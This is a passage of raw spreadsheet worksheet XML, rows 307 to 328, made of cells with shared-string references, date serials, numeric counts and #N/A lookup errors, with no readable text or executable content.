      </c>
      <c r="M307" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N307" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O307" s="1"/>
      <c r="P307" s="1"/>
      <c r="Q307" s="1" t="s">
        <v>2993</v>
      </c>
      <c r="R307" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S307" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T307" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U307" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V307" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W307" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="308" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A308" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B308" s="51">
        <v>44474.412798113422</v>
      </c>
      <c r="C308" s="1" t="s">
        <v>2997</v>
      </c>
      <c r="D308" s="43">
        <v>100</v>
      </c>
      <c r="E308" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="F308" s="26">
        <v>100</v>
      </c>
      <c r="G308" s="1" t="s">
        <v>2999</v>
      </c>
      <c r="H308" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="I308" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J308" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K308" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L308" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M308" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N308" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O308" s="1"/>
      <c r="P308" s="1"/>
      <c r="Q308" s="1" t="s">
        <v>2993</v>
      </c>
      <c r="R308" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S308" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T308" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U308" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V308" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W308" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="309" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A309" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B309" s="51">
        <v>44474.412798159719</v>
      </c>
      <c r="C309" s="1" t="s">
        <v>2997</v>
      </c>
      <c r="D309" s="43">
        <v>100</v>
      </c>
      <c r="E309" s="1" t="s">
        <v>3001</v>
      </c>
      <c r="F309" s="26">
        <v>100</v>
      </c>
      <c r="G309" s="1" t="s">
        <v>3002</v>
      </c>
      <c r="H309" s="1" t="s">
        <v>3003</v>
      </c>
      <c r="I309" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J309" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K309" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L309" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M309" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N309" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O309" s="1"/>
      <c r="P309" s="1"/>
      <c r="Q309" s="1" t="s">
        <v>2993</v>
      </c>
      <c r="R309" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S309" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T309" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U309" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V309" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W309" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="310" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A310" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B310" s="51">
        <v>44649.621827025461</v>
      </c>
      <c r="C310" s="1" t="s">
        <v>3004</v>
      </c>
      <c r="D310" s="26">
        <v>100</v>
      </c>
      <c r="E310" s="1" t="s">
        <v>3005</v>
      </c>
      <c r="F310" s="26">
        <v>100</v>
      </c>
      <c r="G310" s="57" t="s">
        <v>3006</v>
      </c>
      <c r="H310" s="1" t="s">
        <v>3007</v>
      </c>
      <c r="I310" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J310" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K310" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L310" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M310" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N310" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O310" s="1"/>
      <c r="P310" s="1"/>
      <c r="Q310" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R310" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S310" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T310" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U310" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V310" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W310" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="311" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A311" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B311" s="51">
        <v>44721.899391134262</v>
      </c>
      <c r="C311" s="1" t="s">
        <v>3008</v>
      </c>
      <c r="D311" s="26">
        <v>100</v>
      </c>
      <c r="E311" s="1" t="s">
        <v>3009</v>
      </c>
      <c r="F311" s="26">
        <v>100</v>
      </c>
      <c r="G311" s="57" t="s">
        <v>3010</v>
      </c>
      <c r="H311" s="1" t="s">
        <v>3011</v>
      </c>
      <c r="I311" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J311" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K311" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L311" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M311" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N311" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O311" s="1"/>
      <c r="P311" s="1"/>
      <c r="Q311" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R311" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S311" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T311" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U311" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V311" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W311" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="312" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A312" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B312" s="51">
        <v>44671.611334131943</v>
      </c>
      <c r="C312" s="1" t="s">
        <v>3012</v>
      </c>
      <c r="D312" s="26">
        <v>101</v>
      </c>
      <c r="E312" s="1" t="s">
        <v>3013</v>
      </c>
      <c r="F312" s="26">
        <v>101</v>
      </c>
      <c r="G312" s="57" t="s">
        <v>3014</v>
      </c>
      <c r="H312" s="1" t="s">
        <v>3015</v>
      </c>
      <c r="I312" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J312" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K312" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L312" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M312" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N312" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O312" s="1"/>
      <c r="P312" s="1"/>
      <c r="Q312" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R312" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S312" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T312" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U312" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V312" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W312" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="313" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A313" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B313" s="51">
        <v>44475.653661631943</v>
      </c>
      <c r="C313" s="1" t="s">
        <v>3016</v>
      </c>
      <c r="D313" s="43">
        <v>110</v>
      </c>
      <c r="E313" s="1" t="s">
        <v>3017</v>
      </c>
      <c r="F313" s="26">
        <v>110</v>
      </c>
      <c r="G313" s="57" t="s">
        <v>3018</v>
      </c>
      <c r="H313" s="1" t="s">
        <v>3019</v>
      </c>
      <c r="I313" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J313" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K313" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L313" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M313" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="N313" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="O313" s="1"/>
      <c r="P313" s="1"/>
      <c r="Q313" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="R313" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S313" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T313" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U313" s="83">
        <v>4</v>
      </c>
      <c r="V313" s="83">
        <v>10</v>
      </c>
      <c r="W313" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="314" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A314" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B314" s="51">
        <v>44684.642173368055</v>
      </c>
      <c r="C314" s="1" t="s">
        <v>3020</v>
      </c>
      <c r="D314" s="43">
        <v>101</v>
      </c>
      <c r="E314" s="1" t="s">
        <v>3021</v>
      </c>
      <c r="F314" s="26">
        <v>101</v>
      </c>
      <c r="G314" s="57" t="s">
        <v>3022</v>
      </c>
      <c r="H314" s="1" t="s">
        <v>3023</v>
      </c>
      <c r="I314" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J314" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K314" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L314" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M314" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N314" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O314" s="1"/>
      <c r="P314" s="1"/>
      <c r="Q314" s="1" t="s">
        <v>3024</v>
      </c>
      <c r="R314" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S314" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T314" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U314" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V314" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W314" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="315" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A315" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B315" s="51">
        <v>44645.746241168985</v>
      </c>
      <c r="C315" s="1" t="s">
        <v>3025</v>
      </c>
      <c r="D315" s="26">
        <v>100</v>
      </c>
      <c r="E315" s="1" t="s">
        <v>3026</v>
      </c>
      <c r="F315" s="26">
        <v>100</v>
      </c>
      <c r="G315" s="57" t="s">
        <v>3027</v>
      </c>
      <c r="H315" s="1" t="s">
        <v>3028</v>
      </c>
      <c r="I315" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J315" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K315" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L315" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M315" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N315" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O315" s="1"/>
      <c r="P315" s="1"/>
      <c r="Q315" s="1" t="s">
        <v>3603</v>
      </c>
      <c r="R315" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S315" s="83">
        <v>17</v>
      </c>
      <c r="T315" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U315" s="83">
        <v>7</v>
      </c>
      <c r="V315" s="83">
        <v>1</v>
      </c>
      <c r="W315" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="316" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A316" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B316" s="51">
        <v>44769.862446990737</v>
      </c>
      <c r="C316" s="1" t="s">
        <v>3025</v>
      </c>
      <c r="D316" s="26">
        <v>200</v>
      </c>
      <c r="E316" s="1" t="s">
        <v>3026</v>
      </c>
      <c r="F316" s="26">
        <v>200</v>
      </c>
      <c r="G316" s="57" t="s">
        <v>3027</v>
      </c>
      <c r="H316" s="1" t="s">
        <v>3028</v>
      </c>
      <c r="I316" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J316" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K316" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L316" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M316" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N316" s="1" t="s">
        <v>291</v>
      </c>
      <c r="O316" s="1"/>
      <c r="P316" s="1"/>
      <c r="Q316" s="1" t="s">
        <v>3030</v>
      </c>
      <c r="R316" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S316" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T316" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U316" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V316" s="83">
        <v>1</v>
      </c>
      <c r="W316" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="317" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A317" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B317" s="51">
        <v>44294.653877083336</v>
      </c>
      <c r="C317" s="1" t="s">
        <v>3031</v>
      </c>
      <c r="D317" s="43">
        <v>112</v>
      </c>
      <c r="E317" s="1" t="s">
        <v>3032</v>
      </c>
      <c r="F317" s="26">
        <v>102</v>
      </c>
      <c r="G317" s="1" t="s">
        <v>3033</v>
      </c>
      <c r="H317" s="1" t="s">
        <v>3034</v>
      </c>
      <c r="I317" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J317" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K317" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L317" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M317" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N317" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O317" s="1"/>
      <c r="P317" s="1"/>
      <c r="Q317" s="1" t="s">
        <v>3604</v>
      </c>
      <c r="R317" s="83">
        <v>28</v>
      </c>
      <c r="S317" s="83">
        <v>6</v>
      </c>
      <c r="T317" s="83">
        <v>12</v>
      </c>
      <c r="U317" s="83">
        <v>26</v>
      </c>
      <c r="V317" s="83">
        <v>1738</v>
      </c>
      <c r="W317" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="318" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A318" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B318" s="51">
        <v>44522.390718946757</v>
      </c>
      <c r="C318" s="1" t="s">
        <v>3031</v>
      </c>
      <c r="D318" s="43">
        <v>112</v>
      </c>
      <c r="E318" s="1" t="s">
        <v>3036</v>
      </c>
      <c r="F318" s="26">
        <v>112</v>
      </c>
      <c r="G318" s="1" t="s">
        <v>3037</v>
      </c>
      <c r="H318" s="1" t="s">
        <v>3038</v>
      </c>
      <c r="I318" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J318" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K318" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L318" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M318" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N318" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O318" s="1"/>
      <c r="P318" s="1"/>
      <c r="Q318" s="1" t="s">
        <v>3604</v>
      </c>
      <c r="R318" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S318" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T318" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U318" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V318" s="83">
        <v>153</v>
      </c>
      <c r="W318" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="319" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A319" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B319" s="51">
        <v>44294.653877118057</v>
      </c>
      <c r="C319" s="1" t="s">
        <v>3031</v>
      </c>
      <c r="D319" s="43">
        <v>112</v>
      </c>
      <c r="E319" s="1" t="s">
        <v>3039</v>
      </c>
      <c r="F319" s="26">
        <v>102</v>
      </c>
      <c r="G319" s="1" t="s">
        <v>3040</v>
      </c>
      <c r="H319" s="1" t="s">
        <v>3041</v>
      </c>
      <c r="I319" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J319" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K319" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L319" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M319" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N319" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O319" s="1"/>
      <c r="P319" s="1"/>
      <c r="Q319" s="1" t="s">
        <v>3604</v>
      </c>
      <c r="R319" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S319" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T319" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U319" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V319" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W319" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="320" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A320" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B320" s="51">
        <v>44342.385217916664</v>
      </c>
      <c r="C320" s="1" t="s">
        <v>3042</v>
      </c>
      <c r="D320" s="43">
        <v>205</v>
      </c>
      <c r="E320" s="1" t="s">
        <v>3043</v>
      </c>
      <c r="F320" s="43">
        <v>204</v>
      </c>
      <c r="G320" s="1" t="s">
        <v>3044</v>
      </c>
      <c r="H320" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="I320" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J320" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K320" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L320" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M320" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N320" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O320" s="1" t="s">
        <v>1377</v>
      </c>
      <c r="P320" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q320" s="1" t="s">
        <v>3605</v>
      </c>
      <c r="R320" s="83">
        <v>319853</v>
      </c>
      <c r="S320" s="83">
        <v>1060325</v>
      </c>
      <c r="T320" s="83">
        <v>690881</v>
      </c>
      <c r="U320" s="83">
        <v>1431176</v>
      </c>
      <c r="V320" s="83">
        <v>1574453</v>
      </c>
      <c r="W320" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="321" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A321" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B321" s="51">
        <v>44342.385217916664</v>
      </c>
      <c r="C321" s="1" t="s">
        <v>3042</v>
      </c>
      <c r="D321" s="43">
        <v>300</v>
      </c>
      <c r="E321" s="1" t="s">
        <v>3043</v>
      </c>
      <c r="F321" s="43">
        <v>300</v>
      </c>
      <c r="G321" s="1" t="s">
        <v>3044</v>
      </c>
      <c r="H321" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="I321" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J321" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K321" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L321" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M321" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N321" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O321" s="1" t="s">
        <v>1377</v>
      </c>
      <c r="P321" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q321" s="1" t="s">
        <v>3606</v>
      </c>
      <c r="R321" s="83">
        <v>319853</v>
      </c>
      <c r="S321" s="83">
        <v>1060325</v>
      </c>
      <c r="T321" s="83">
        <v>690881</v>
      </c>
      <c r="U321" s="83">
        <v>1431176</v>
      </c>
      <c r="V321" s="83">
        <v>1574453</v>
      </c>
      <c r="W321" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="322" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A322" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B322" s="51">
        <v>44494.699802650466</v>
      </c>
      <c r="C322" s="1" t="s">
        <v>3048</v>
      </c>
      <c r="D322" s="43">
        <v>100</v>
      </c>
      <c r="E322" s="1" t="s">
        <v>3049</v>
      </c>
      <c r="F322" s="26">
        <v>100</v>
      </c>
      <c r="G322" s="1" t="s">
        <v>3050</v>
      </c>
      <c r="H322" s="1" t="s">
        <v>1360</v>
      </c>
      <c r="I322" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J322" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K322" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L322" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M322" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N322" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O322" s="1"/>
      <c r="P322" s="1"/>
      <c r="Q322" s="1" t="s">
        <v>3607</v>
      </c>
      <c r="R322" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S322" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T322" s="83">
        <v>2</v>
      </c>
      <c r="U322" s="83">
        <v>753</v>
      </c>
      <c r="V322" s="83">
        <v>2127812</v>
      </c>
      <c r="W322" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="323" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A323" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B323" s="51">
        <v>44079.513581053237</v>
      </c>
      <c r="C323" s="1" t="s">
        <v>3052</v>
      </c>
      <c r="D323" s="43">
        <v>110</v>
      </c>
      <c r="E323" s="1" t="s">
        <v>3053</v>
      </c>
      <c r="F323" s="26">
        <v>110</v>
      </c>
      <c r="G323" s="1" t="s">
        <v>3054</v>
      </c>
      <c r="H323" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="I323" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J323" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K323" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L323" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M323" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N323" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O323" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="P323" s="1"/>
      <c r="Q323" s="1" t="s">
        <v>3608</v>
      </c>
      <c r="R323" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S323" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T323" s="83">
        <v>63</v>
      </c>
      <c r="U323" s="83">
        <v>309</v>
      </c>
      <c r="V323" s="83">
        <v>352</v>
      </c>
      <c r="W323" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="324" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A324" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B324" s="51">
        <v>44079.513581053237</v>
      </c>
      <c r="C324" s="1" t="s">
        <v>3052</v>
      </c>
      <c r="D324" s="43">
        <v>200</v>
      </c>
      <c r="E324" s="1" t="s">
        <v>3053</v>
      </c>
      <c r="F324" s="26">
        <v>200</v>
      </c>
      <c r="G324" s="1" t="s">
        <v>3054</v>
      </c>
      <c r="H324" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="I324" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J324" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K324" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L324" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M324" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N324" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O324" s="1" t="s">
        <v>1356</v>
      </c>
      <c r="P324" s="1"/>
      <c r="Q324" s="1" t="s">
        <v>3609</v>
      </c>
      <c r="R324" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S324" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T324" s="83">
        <v>63</v>
      </c>
      <c r="U324" s="83">
        <v>309</v>
      </c>
      <c r="V324" s="83">
        <v>352</v>
      </c>
      <c r="W324" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="325" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A325" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B325" s="61">
        <v>44420.714931215276</v>
      </c>
      <c r="C325" s="49" t="s">
        <v>3065</v>
      </c>
      <c r="D325" s="76">
        <v>102</v>
      </c>
      <c r="E325" s="49" t="s">
        <v>3066</v>
      </c>
      <c r="F325" s="76">
        <v>102</v>
      </c>
      <c r="G325" s="49" t="s">
        <v>3067</v>
      </c>
      <c r="H325" s="49" t="s">
        <v>3068</v>
      </c>
      <c r="I325" s="49" t="s">
        <v>82</v>
      </c>
      <c r="J325" s="49" t="s">
        <v>43</v>
      </c>
      <c r="K325" s="49" t="s">
        <v>24</v>
      </c>
      <c r="L325" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M325" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N325" s="1"/>
      <c r="O325" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P325" s="1"/>
      <c r="Q325" s="49" t="s">
        <v>3568</v>
      </c>
      <c r="R325" s="84">
        <v>2558</v>
      </c>
      <c r="S325" s="83">
        <v>2634</v>
      </c>
      <c r="T325" s="83">
        <v>1930</v>
      </c>
      <c r="U325" s="84">
        <v>2011</v>
      </c>
      <c r="V325" s="84">
        <v>2027</v>
      </c>
      <c r="W325" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="326" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A326" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B326" s="61">
        <v>44119.703438611112</v>
      </c>
      <c r="C326" s="49" t="s">
        <v>3075</v>
      </c>
      <c r="D326" s="76">
        <v>101</v>
      </c>
      <c r="E326" s="49" t="s">
        <v>3076</v>
      </c>
      <c r="F326" s="60">
        <v>101</v>
      </c>
      <c r="G326" s="49" t="s">
        <v>3077</v>
      </c>
      <c r="H326" s="49" t="s">
        <v>3078</v>
      </c>
      <c r="I326" s="49" t="s">
        <v>156</v>
      </c>
      <c r="J326" s="49" t="s">
        <v>226</v>
      </c>
      <c r="K326" s="49" t="s">
        <v>27</v>
      </c>
      <c r="L326" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M326" s="49" t="s">
        <v>308</v>
      </c>
      <c r="N326" s="49" t="s">
        <v>309</v>
      </c>
      <c r="O326" s="49" t="s">
        <v>3079</v>
      </c>
      <c r="P326" s="49"/>
      <c r="Q326" s="49" t="s">
        <v>3080</v>
      </c>
      <c r="R326" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="S326" s="83">
        <v>2</v>
      </c>
      <c r="T326" s="83">
        <v>1</v>
      </c>
      <c r="U326" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="V326" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="W326" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="327" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A327" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B327" s="61">
        <v>44063.692973888887</v>
      </c>
      <c r="C327" s="49" t="s">
        <v>3081</v>
      </c>
      <c r="D327" s="76">
        <v>100</v>
      </c>
      <c r="E327" s="49" t="s">
        <v>3082</v>
      </c>
      <c r="F327" s="60">
        <v>100</v>
      </c>
      <c r="G327" s="49" t="s">
        <v>3083</v>
      </c>
      <c r="H327" s="49" t="s">
        <v>3084</v>
      </c>
      <c r="I327" s="49" t="s">
        <v>185</v>
      </c>
      <c r="J327" s="49" t="s">
        <v>186</v>
      </c>
      <c r="K327" s="49" t="s">
        <v>16</v>
      </c>
      <c r="L327" s="77" t="s">
        <v>83</v>
      </c>
      <c r="M327" s="49" t="s">
        <v>72</v>
      </c>
      <c r="N327" s="49"/>
      <c r="O327" s="49" t="s">
        <v>2176</v>
      </c>
      <c r="P327" s="49"/>
      <c r="Q327" s="49" t="s">
        <v>3610</v>
      </c>
      <c r="R327" s="84">
        <v>103245</v>
      </c>
      <c r="S327" s="83">
        <v>90069</v>
      </c>
      <c r="T327" s="83">
        <v>84307</v>
      </c>
      <c r="U327" s="84">
        <v>94873</v>
      </c>
      <c r="V327" s="84">
        <v>120539</v>
      </c>
      <c r="W327" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="328" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A328" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B328" s="61">
        <v>44603.453514780093</v>
      </c>
      <c r="C328" s="49" t="s">
        <v>3090</v>
      </c>
      <c r="D328" s="76">
        <v>130</v>
      </c>
      <c r="E328" s="49" t="s">
        <v>3091</v>
      </c>
